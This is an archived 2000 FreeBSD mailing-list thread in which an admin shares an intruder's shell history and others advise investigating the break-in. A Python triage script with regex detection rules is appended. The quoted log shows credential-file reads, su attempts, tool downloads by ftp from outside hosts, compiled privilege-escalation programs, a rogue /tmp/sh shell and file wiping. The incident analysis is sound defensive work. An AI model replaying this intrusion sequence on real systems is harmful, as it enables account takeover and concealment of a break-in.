Date: Mon, 18 Dec 2000 16:14:20 -0500 (EST)
From: Alexander V P <alex@big-blue.net>
To: Joe Oliveiro <joe@advancewebhosting.com>
Cc: "Gerald T. Freymann" <freymann@eagle.ca>, Questions <questions@FreeBSD.ORG>
Subject: Re: Hacker history file - OUCH
Message-ID: <Pine.BSF.4.05.10012181605150.23598-100000@borg.starbase.net>
In-Reply-To: <Pine.BSF.4.21.0012181556100.6889-100000@joe.pythonvideo.com>
hi, nothing wrong with that as far as i'm concerned. we (freebsd community) don't
have that many break-ins and every one needs to be investigated. personally i would
do that and post the results somewhere, so tomorrow's (less experienced, fortunate
etc) admins can read about it. after all i'll wipe that box anyway ;-). it takes
lotsa guts to post on a freebsd mailing list (or anywhere for that matter)
something like this.

alex

On Mon, 18 Dec 2000, Joe Oliveiro wrote:

> i like wiping the box!
>
> Microsoft: "Where would you like to go to today"
> Linux: "Where would you like to go tomorrow"
> FreeBSD: "Hey, when are you guys going to catch up"
>
> On Mon, 18 Dec 2000, Alexander V P wrote:
>
> > hi,
> > do you keep/have logs about what ftp transfers he did?
> > did you send mail to root@he.net, or the .mx domain?
> > any idea how he broke in? what freebsd are you using?
> > if i were in your place, i'd unplug the box and try to find out more about
> > this. don't do like most of the sysadmins that just wipe the box.
> > alex
> >
> > On Mon, 18 Dec 2000, Gerald T. Freymann wrote:
> >
> > > Seems we have an intruder on one of our boxes... the .history file from the
> > > troubled account follows:
> > >
> > > cd bnc
> > > ls
> > > ./bash
> > > who
> > > cd /etc
> > > more passwd
> > > ps -l
> > > ls -l
> > > more pwd.db
> > > more hosts
> > > pico adduser.conf.bak
> > > pico group
> > > su user
> > > pico group.bak
> > > pico ftpuser
> > > O
> > > pico ftpusers
> > > su toor
> > > su operator
> > > id
> > > pico spwd.db
> > > su wheel
> > > pico passwd
> > > cd /var/tmp
> > > ls -a
> > > cd ...
> > > ls -a
> > > cd ..
> > > ls -l
> > > ls -al
> > > cd ...
> > > ftp copper.he.net
> > > chmod u+x xcon
> > > ./xcon
> > > id
> > > rm *
> > > ls
> > > who
> > > cd /var/tmp
> > > ls -a
> > > ls -al
> > > cd ...
> > > ls -a
> > > ftp cih.edu.mx
> > > ls
> > > cc bsd1 bsd-cron.c
> > > cc -o bsd1 bsd-cron.c
> > > ./bsd1
> > > id
> > > cc -o bsd2 bsd2.c
> > > ./bsd2
> > > id
> > > ls
> > > ftp cih.edu.mx
> > > ./bsd sh
> > > ./bsd.sh
> > > chmod u+x bsd.sh
> > > ./bsd.sh
> > > /tmp/sh
> > > id
> > > ls
> > > cc -o bsdsmail bsdsmail.c
> > > ./bsdsmail
> > > ls -a
> > > pico hack
> > > ls
> > > pico user.inf
> > > ls
> > > id
> > > rm *
> > > exit
> > >
> > > Anybody recognize what the intruder has set up?
> > >
> > > -Gerry
> > >
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > > with "unsubscribe freebsd-questions" in the body of the message
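As an added example (not part of this thread, and not anyone's tool from it), here is a small Python triage script that runs a handful of defender-chosen heuristics over an excerpt of the quoted .history file, so a reviewer can see at a glance which entries (account-database reads, su attempts, dotted hidden directories, fetch/compile/run of local files, bulk deletions) deserve a closer look before the box is wiped. The rule list is my own assumption for illustration, not any standard or vendor list.

```python
import re

# Excerpt of the intruder's .history as quoted in Gerry's post (constructed subset).
HISTORY = """cd /etc
more passwd
more pwd.db
pico group
su toor
su wheel
pico passwd
cd /var/tmp
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
id
rm *
cc -o bsd1 bsd-cron.c
./bsd1
/tmp/sh
exit""".splitlines()

# Heuristic rules chosen for this example (an assumption); first match wins.
RULES = [
    (r"^(more|cat|pico|vi)\s+.*(passwd|pwd\.db|group|ftpusers)", "read or edit of an account database"),
    (r"^su\s+", "privilege escalation attempt via su"),
    (r"^cd\s+\.{3,}", "entering a directory hidden behind a dotted name"),
    (r"^ftp\s+\S+", "outbound ftp transfer"),
    (r"^chmod\s+\S*\+x", "marking a file executable"),
    (r"^cc\b", "compiling source on the host"),
    (r"^rm\s+\*", "bulk deletion of working files"),
    (r"^(\./|/tmp/|/var/tmp/)", "execution of a file from the working or temp directory"),
]

def triage_history(lines):
    """Return (line_no, command, reason) for every history line that a rule flags."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = raw.strip()
        for pattern, reason in RULES:
            if re.search(pattern, cmd):
                findings.append((n, cmd, reason))
                break  # one reason per command is enough for triage
    return findings

if __name__ == "__main__":
    for n, cmd, reason in triage_history(HISTORY):
        print(f"{n:3}: {cmd:<24} {reason}")
```

Lines such as `id`, `exit` and plain `cd /etc` are left unflagged on purpose; the point is to rank the session for a human, not to replace reading the whole file and the ftp logs Alex asks about.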